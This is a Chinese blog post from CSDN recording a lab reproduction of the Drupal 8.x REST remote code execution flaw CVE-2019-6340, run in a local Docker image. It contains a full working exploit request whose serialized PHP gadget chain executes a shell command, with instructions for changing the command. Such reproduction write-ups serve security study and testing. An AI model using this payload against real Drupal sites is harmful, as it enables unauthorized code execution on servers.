Drupal 8.x 远程执行代码漏洞复现记录

最新推荐文章于 2024-04-10 13:24:45 发布
最新推荐文章于 2024-04-10 13:24:45 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aliexiansheng/article/details/108123373
版权

Drupal 8.x 远程执行代码漏洞复现记录

目录

  1. 漏洞概述
  2. 漏洞影响版本
  3. 漏洞环境搭建

1.漏洞概述

Drupal官方发布安全通告称修复了一个高危的远程代码执行漏洞(CVE-2019-6340)。该漏洞源于某些字段在通过非表格(non-form resources)类型输入时未能正确过滤,导致潜在的任意PHP代码执行

2.影响版本

Drupal 8.6.x < 8.6.10
Drupal 8.5.x(或更早版本) < 8.5.11

3.环境搭建

1.使用docker可以快速搭建cve-2019-6340
在这里插入图片描述

docker search cve-2019-6340

docker search : 从Docker Hub查找镜像
2.部署环境
在这里插入图片描述拉取完成后,启动镜像。
在这里插入图片描述

docker run -d --name drupal -P knqyf263/cve-2019-6340
docker ps

根据信息连接
在这里插入图片描述

POST /node/?_format=hal_json HTTP/1.1 Host: <漏洞环境的IP:PORT> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Connection:  keep-alive Content-Type: application/hal+json Accept:  */* Cache-Control: no-cache Content-Length: 636

{   "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }   ],   "_links": {
    "type": {
      "href": "<漏洞环境的IP:PORT>/rest/type/shortcut/default"
    }   } }

request和response详细信息。其中红色方框内的“id”区域为所执行的命令,数字2则是命令的长度。如果想要执行 echo 1,则前面的数字需要改成 6

sera__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CVE-2019-6340】Drupal 8.x REST RCE 远程执行代码漏洞复现
Blog of Jaoing
04-21 2791
Drupal 是由德赖斯·布伊泰尔特创立的自由开源内容管理系统,用PHP语言写成。在业界,Drupal常被视为内容管理框架(CMF),而非一般意义上的内容管理系统(CMS)。 2019-02-20,Drupal 安全团队披露了一个安全漏洞(CVE-2019-6340),如果网站开启了......
CentOS 7.x 安装drupal 8
邱凯翔 Edward 的个人博客
05-14 4158
1.drupal 8.x 需求 类型 需求 Database 1.MySQL 5.5.3/MariaDB 5.5.20/Percona Server 5.5.8 or higher with PDO and an InnoDB-compatible primary storage engine,2.PostgreSQL 9.1.2 or higher with PDO,3.SQLite
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1679
drupal命令执行
【CVE-2018-7600】Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2809
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal代码和文档,可以知道,对于
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
weixin_56537388的博客
11-27 148
启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini。环境启动后,访问 将会看到drupal的安装页面,一路默认配置下一步安装。这里官方提供的没有切换路径,需要自己切换以下,可以cat sources.list看有没有换源成功。# 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源。这里用阿里云的源,网易的失效了。
PHP代码审计之反序列化攻击链CVE-2019-6340漏洞研究
shelter1234567的博客
12-24 1561
简简单单介绍下php的反序列化漏洞
Drupal远程代码执行漏洞(CVE-2018-7600)
最新发布
ANOrange的博客
04-10 785
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
Drupalgeddon2:针对 Drupal v7.x + v8.x 的漏洞利用 (Drupalgeddon 2 CVE-2018-7600 SA-CORE-2018-002)
05-29
CVE-2018-7600 | Drupal 8.5.x < 8.5.1 / 8.4.x < 8.4.6 / 8.x < 8.3.9 / 7.x? < 7.58 / < 6.x? - 'Drupalgeddon2' RCE (SA-CORE-2018-002) ( ) 支持: Drupal < 8.3.9 / < 8.4.6 / < ...
drupal合同:Drupal 8.x维护和支持合同模板
02-05
本合同模板针对的是Drupal 8.x的维护和支持服务,适用于那些希望确保其基于Drupal 8.x的网站或应用能够得到持续更新、安全维护和故障解决的专业服务。 一、合同概述 Drupal 8.x维护和支持合同是客户与Drupal开发...
CMS程序Drupal 6.13-drupal6.x-codepub.zip
03-09
这个压缩包“Drupal 6.13-drupal6.x-codepub.zip”包含了 Drupal 6.13的核心代码和其他可能的相关资源,便于用户下载、安装和使用。 1. **Drupal 6核心组件**:Drupal 6的核心包括了内容管理、用户管理、角色权限、...
Drupal RCE(CVE-2019-6340)复现踩坑
痴人说梦梦中人
10-14 1683
CVE-2019-6340 影响范围:Drupal < 8.6.10,Drupal < 8.5.12 1、搜索镜像 docker search cve-2019-6340 2、拉取 docker pull knqyf263/cve-2019-6340 3、运行 docker run -d -t -p 80:80 knqyf263/cve-2019-6340 4、访问url:http://174.99.8.203/node/1 5、抓取数据包并修改 注意三点: A、POST /node/?_f
billu_b0x2 靶机渗透实战
n5xxxx__zy的博客
07-23 692
目标靶机ip:192.168.146.140, 目的是获得root权限 1.信息收集 开放了四个端口 22 80 111 8080 80端口用Drupal框架搭的站 用dirb扫一下目录 很多目录 进去看看有没有有用的信息 这东西不知道干嘛用的 先留着 目录跑了半天终于跑完了发现了一个页面 去查查Drupal8.3.5有没有可以利用的漏洞 打开神器 search drupal...
cve-2019-6340 drupal8 rest rce 漏洞复现
whatday的专栏
07-20 2968
目录 0X1 漏洞概述 0X2 环境搭建 0X3 漏洞利用 0X4漏洞分析 0X1 漏洞概述 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 .
Drupal远程代码执行漏洞(CVE-2019-6340)
锋刃科技的博客
06-24 1607
前言 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 JSON:API服务模块开启,此服务尚未分析。 影响版本 Drupal < 8.6.1.
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2056
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
Drupal 7.x模块开发基础:创建新内容节点跟踪器
在这个Drupal 7.x模块开发教程中,我们将深入学习如何创建一个实用的功能模块,即"current_posts",它能够列出最近一周内添加的新内容节点,例如博客文章或论坛帖子。首先,命名模块至关重要,应遵循 Drupal 的命名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值